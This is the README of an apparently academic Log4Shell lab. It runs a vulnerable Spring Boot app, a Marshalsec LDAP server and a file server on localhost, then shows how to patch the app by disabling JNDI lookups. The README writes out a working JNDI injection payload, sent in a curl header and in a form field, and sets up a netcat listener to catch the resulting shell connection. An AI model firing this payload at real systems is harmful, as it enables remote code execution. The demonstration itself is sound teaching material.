This repo contains all you will need to demonstrate the Log4Shell vulnerability using a Java LDAP server from Marhelsec, a python file server and a Springboot web application.
- Asinsa Guniyangodage (850617)
- Joshua Murray (1903122)
- Docker and Docker Compose (https://docs.docker.com/compose/install/)VulnerableWebApp-exploitable.jar
- JDK 11 (or newer) (https://www.oracle.com/java/technologies/downloads/)
- Linux (commands assume this, but may work in windows)
- Netcat
- Debian:
sudo apt install netcat - Arch:
pamac install gnu-netcat - RHEL:
yum install -y nc - Mac:
brew install netcat
- Debian:
-
Clone the repository
-
Navigate to the source folder:
cd Log4ShellDemo-main -
Run the Docker containers for the Java LDAP server and the Python file server using Docker Compose:
docker compose up -
Wait for the containers to start up. You should see output in the terminal indicating that the containers have started successfully. Such as below:
log4shelldemo-marshel_ldap-1 | Listening on 0.0.0.0:1389 log4shelldemo-file_server-1 | Exploit java class created success log4shelldemo-file_server-1 | Starting Webserver on port 8000 http://0.0.0.0:8000
-
Start the springboot webapp :
- Exploitable
java -jar ./VulnerableServer/VulnerableWebApp/target/VulnerableWebApp-exploitable.jar- Patched
java -jar ./VulnerableServer/VulnerableWebApp/target/VulnerableWebApp-patched.jar
For either approach you are required to use netcat to listen for incoming connections this can be done by running:
nc -lvnp 9002
-
In another terminal run the following command to send a curl request to the web server
curl 127.0.0.1:8090/test -H 'X-Api-Version: ${jndi:ldap://localhost:1389/a}' -
You should have a new connection on netcat
foo@bar~/Log4ShellDemo$ nc -lvnp 9002 Connection from 127.0.0.1:40174
- Navigate to
http://127.0.0.1:8090/form
-
Enter the Name
${jndi:ldap://localhost:1389/a}and submit the form -
You should have a new connection on netcat
foo@bar:~/Log4ShellDemo$ nc -lvnp 9002 Connection from 127.0.0.1:40174
In order to patch this vulnerability you can run the web application with the command below
java -jar ./VulnerableServer/VulnerableWebApp/target/VulnerableWebApp-patched.jar
This web app has been modified to include the following code that disables JNDI lookups
System.setProperty("LOG4J_FORMAT_MSG_NO_LOOKUPS", "true");
An alternative patch that removes all vulnerabilities related to Log4j would be to remove the explicit version tag for the log4j dependencies in pom.xml as they have been patched as of version 2.17.
- The LDAP server was built using the Marshalsec repo here which is under an MIT License
- CSS for the form page was taken from
Glassmorphism login Form Tutorial in html csshere which is also under an MIT License